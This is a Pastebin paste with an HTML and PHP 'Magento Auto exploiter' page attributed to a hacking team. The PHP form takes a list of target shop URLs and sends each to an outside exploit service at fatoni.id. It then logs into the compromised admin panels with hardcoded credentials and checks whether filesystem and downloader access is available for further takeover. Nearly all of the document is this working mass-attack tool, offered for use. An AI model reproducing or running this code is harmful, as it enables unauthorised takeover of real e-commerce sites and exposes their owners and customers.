API tools faq
paste
Advertisement
Wendi124

Untitled

Wendi124
Jun 2nd, 2016
418
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.92 KB | None | 0 0
raw download clone embed print report
  1. <html>
  2. <script type="text/javascript" src="http://ahmad-rifai-
  3. tools.googlecode.com/files/salju-blog.ahmadrifai.net.js" /></script>
  4. <script type="text/javascript" src="//www.blogger.com/static/v1/common/js/3287480799-
  5. csitail.js"></script>
  6. <script type="text/javascript">BLOG_initCsi('classic_blogspot');</script>
  7. <style type="text/css">.cakrahide {z-index: 1000;height: 15px;width: 280px;border: 2px solid #666666;background: #D11717
  8.  
  9. -moz-linear-gradient(top,#000,#D11717);background: -webkit-gradient(linear, left top, left bottom, from(#000), to(#D11717));border-radius: 12px;-moz-border-radius:
  10.  
  11. 12px;-webkit-border-radius: 12px;-o-transition: all 1s ease-in-out;-moz-transition: all 1s ease-in-out;-webkit-transition: all 1s ease-in-out;padding: 5px 5px;margin:
  12.  
  13. 15px auto;font: 8px Metamorphous;color: #FF0000;overflow: hidden;box-shadow: 0 1px 8px #000;-moz-box-shadow: 0 1px 8px #000;-webkit-box-shadow: 0 1px 8px
  14.  
  15. #000;}.cakrahide:hover {min-height: 270px;border: 2px solid #333333;background: #111;box-shadow: 0 1px 15px #000;-moz-box-shadow: 0 1px 15px #000;-webkit-box-shadow: 0
  16.  
  17. 1px 15px #000;color: #000; text-shadow: 0 1px 1px #888;}.cakrahide h3, .isicakra h3 {font-size: 8px;font-family: Metamorphous;font-weight: bold;color:
  18.  
  19. #ffffff;text-align: center;text-shadow: 0px 1px 1px #fff; margin: 3px 5px;background: #000;border-radius: 5px;-moz-border-radius: 5px;-webkit-border-radius:
  20.  
  21. 5px;border: 1px solid #999;-o-transition: all 1s ease-in-out;-moz-transition: all 1s ease-in-out;-webkit-transition: all 1s ease-in-out;}.tejahide h3:hover
  22.  
  23. {box-shadow: 0 1px 8px #000;-moz-box-shadow: 0 1px 8px #000;-webkit-box-shadow: 0 1px 8px #000;}.cakrahide img.mini, .cakrahide img.minianima {width: 70px;border: 4px
  24.  
  25. solid #666;padding: 3px;border-radius: 6px;-moz-border-radius: 6px;-webkit-border-radius: 6px;float: left; margin: 0 10px 5px 0;background: #222;-o-transition: all
  26.  
  27. 1.5s;-moz-transition: all 1.5s;-webkit-transition: all 1.5s;}.cakrahide img.mini:hover, .cakrahide img.minianima:hover {box-shadow: 1px 1px 15px #000;-moz-box-shadow:
  28.  
  29. 1px 1px 15px #000;-webkit-box-shadow: 1px 1px 15px #000;border: 4px solid #CCCCCC;background :#666;-o-transform: scale(1.4);-moz-transform:
  30.  
  31. scale(1.4);-webkit-transform: scale(1.4);margin-top: 20px;margin-left: 15px;}.tejahide img.minianima:hover {-o-transform: scale(1.4) rotate(360deg)
  32.  
  33. translate(0px);-moz-transform: scale(1.4) rotate(360deg) translate(0px);-webkit-transform: scale(1.4) rotate(360deg) translate(0px);}.isicakra {margin-top:
  34.  
  35. 15px;height:225px;overflow: auto;padding: 0 5px;-o-transition: all 1s ease-in-out;-moz-transition: all 1s ease-in-out;-webkit-transition: all 1s ease-in-out;
  36.  
  37. background:#ddd -moz-linear-gradient(top,#ddd,#000);background:-webkit-gradient(linear, left top, left bottom, from(#ddd), to(#000));}.isicakra:hover {background:
  38.  
  39. #333;color: #eee;text-shadow: 0 0px 1px #fe0303;}.isicakra h3 {margin: 20px 0;max-width: 224px;margin-left:10px;background: #000;box-shadow: 0 1px 12px
  40.  
  41. #eee;-moz-box-shadow: 0 1px 12px #eee;-webkit-box-shadow: 0 1px 12px #eee;}.columns{clear:both;line-height:22px;padding:0 0
  42.  
  43. 20px;width:250px}.colleft{float:left;line-height:22px;width:120px}.colright{float:right;line-height:22px;width:120px}.isicakra h3:hover {background: #888;border: 1px
  44.  
  45. solid #666;box-shadow: 0 1px 12px #fff;-moz-box-shadow: 0 1px 12px #fff;-webkit-box-shadow: 0 1px 12px #fff;}.isicakra ul {padding: 0;margin: 0;list-style:
  46.  
  47. none;}.isicakra li {padding: 0;margin: 0;list-style: none;border-bottom:1px dotted #777;}.isicakra li a{color: #FF0000;padding: 0;margin:
  48.  
  49. 0;text-decoration:none;font-size: 12px;-o-transition: all 1.5s;-moz-transition: all 1.5s;-webkit-transition: all 1.5s;}.isicakra li a:hover {-o-transform:
  50.  
  51. scale(1.1);-moz-transform: scale(1.1);-webkit-transform: scale(1.1);color: red;text-shadow: 0 1px 1px #000;margin-left: 20px;}.cakrahide {height: 17px; float:right
  52.  
  53. ;margin-top:0px;z-index: 10000;position: fixed;top:0px;margin-left:690px;} .cakrahide h3, .isicakra {font-size: 11px;}</style>
  54. <div class="cakrahide">
  55. <h3>Contact Me click here!</h3>
  56. <div class="isicakra">
  57. <h3>Welcome</h3>
  58. My name WE N DI a.k.a Unknown7
  59. <div class="columns">
  60. <div class="colleft">
  61. <h3>FansPage my Team</h3>
  62. <ul>
  63.  
  64. <li><a rel="nofollow" href="https://www.facebook.com/RabbitSecOfficial/?fref=ts" target="_blank" title="INDONESIAN CODE PARTY</a></li>
  65. </ul>
  66. </div>
  67. <div class="colright">
  68. <h3>Social</h3>
  69. <ul>
  70. <li><a rel="nofollow" href="https://www.facebook.com/Unknown7.go.id?fref=ts" target="_blank" title="HANDOKO FUJI">Facebook</a></li>
  71.  
  72. </ul>
  73. </div>
  74. </div>
  75.  
  76. </div>
  77. </div>
  78. </div>
  79. <div class='clear'></div>
  80. <span class='widget-item-control'>
  81. <span class='item-control blog-admin'>
  82. <center><h1>Magento Auto exploiter</h1>
  83. <style>html{display:table;height:100%;width:100%;}body{display:table-row;}body{display:table-cell;vertical-align:middle;text-align:center;}a:link{text-decoration:none;}body {background: url(https://images7.alphacoders.com/392/392510.jpg);margin:0;padding:0;background-size:100% 100%}</style>
  84.  
  85.  
  86. <?php
  87. function cover() {
  88. return "<center>[+] Magento Auto Exploit [+]<br>
  89. ## -= Rabbit Security Team - Sanjungan Jiwa =- ##<br>
  90. ## ##<br><br></center>";
  91. }
  92. function ngcurl($url,$post=null) {
  93. $ch = curl_init($url);
  94. if($post != null) {
  95. curl_setopt($ch, CURLOPT_POST, true);
  96. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  97. }
  98. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  99. curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  100. curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
  101. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  102. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  103. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  104. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
  105. return curl_exec($ch);
  106. curl_close($ch);
  107. }
  108. function ambilKata($param, $kata1, $kata2){
  109. if(strpos($param, $kata1) === FALSE) return FALSE;
  110. if(strpos($param, $kata2) === FALSE) return FALSE;
  111. $start = strpos($param, $kata1) + strlen($kata1);
  112. $end = strpos($param, $kata2, $start);
  113. $return = substr($param, $start, $end - $start);
  114. return $return;
  115. }
  116. echo cover();
  117. ?>
  118. <?php
  119. $link = explode("\r\n", $_POST['target']);
  120. $go = $_POST['go'];
  121. if(isset($go)) {
  122. foreach($link as $url) {
  123. $post_to_fatoni = array(
  124. "url" => $url,
  125. "hajar" => "Xploit!",
  126. );
  127. $curl_fatoni = ngcurl("http://fatoni.id/malangXploit.php", $post_to_fatoni);
  128. if(preg_match("/Exploiting Success, mulai mengecek login../", $curl_fatoni)) {
  129. echo "Target: <a href='$url' target='_blank'>$url</a><br>";
  130. echo "Status: Sukses Di Xploit<br>";
  131. echo "Ngecek Login........ ";
  132. $ambil = htmlspecialchars(@file_get_contents($url));
  133. preg_match("/<input name=\"form_key\" type=\"hidden\" value=\"(.*?)\">/", $ambil, $key);
  134. $post_login = array(
  135. "form_key" => $key[1],
  136. "login[username]" => "nyanazunyan",
  137. "dummy" => "",
  138. "login[password]" => "nyan187",
  139. );
  140. $login = ngcurl($url."/admin/", $post_login);
  141. if(preg_match("/Log Out|malang/", $login)) {
  142. $key2 = ambilKata($login,"/filesystem/adminhtml_filesystem/index/key/","/");
  143. $key3 = ambilKata($login,"/system_account/index/key/","/");
  144. echo "OK<br>";
  145. echo "username: malang<br>";
  146. echo "password: malang87<br>";
  147. echo "Filesystem: ";
  148. $curl_filesystem = ngcurl($url."/filesystem/adminhtml_filesystem/index/key/$key2/", null);
  149. if(preg_match("/File System/", $curl_filesystem)) {
  150. echo "Ada<br>";
  151. } else {
  152. echo "Gaada<br>";
  153. }
  154. echo "Downloader: ";
  155. $post_downloader = array(
  156. "username" => "malang",
  157. "password" => "malang87",
  158. );
  159. $url_d = parse_url($url, PHP_URL_HOST);
  160. $curl_downloader = ngcurl($url_d."/downloader/", $post_downloader);
  161. if(preg_match("/Return to Admin|Log Out/i", $curl_downloader)) {
  162. if(preg_match("/Your Magento folder does not have sufficient write permissions./", $curl_downloader)) {
  163. $stat_down = "<font color=red>Permissions</font>";
  164. } else {
  165. $stat_down = "<font color='#008000'>Permissions</font>";
  166. }
  167. echo "Ada [ <a href='http://$url_d/downloader/' target='_blank'>http://$url_d/downloader/</a> ( $stat_down ) ]<br>";
  168. } else {
  169. echo "Gaada<br>";
  170. }
  171. } else {
  172. echo "Gagal<br>";
  173. }
  174. echo "<br>";
  175. } else {
  176. echo "Target: $url<br>";
  177. echo "Status: Gagal Di Xploit<br><br>";
  178. }
  179. }
  180. } else {
  181. ?>
  182. <html>
  183. <center>
  184. <form method="post">
  185. <textarea name="target" placeholder="http://monkeyshop.be/" style="width: 500px; height: 250px;"></textarea><br>
  186. <input type="submit" name="go" value="Xploit" style="width: 500px;">
  187. </form>
  188. </center>
  189. </html>
  190. <?php
  191. }
  192. ?>
  193. TUTORIAL ---->>
  194. http://gracygirl.com/baca.txt
  195. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!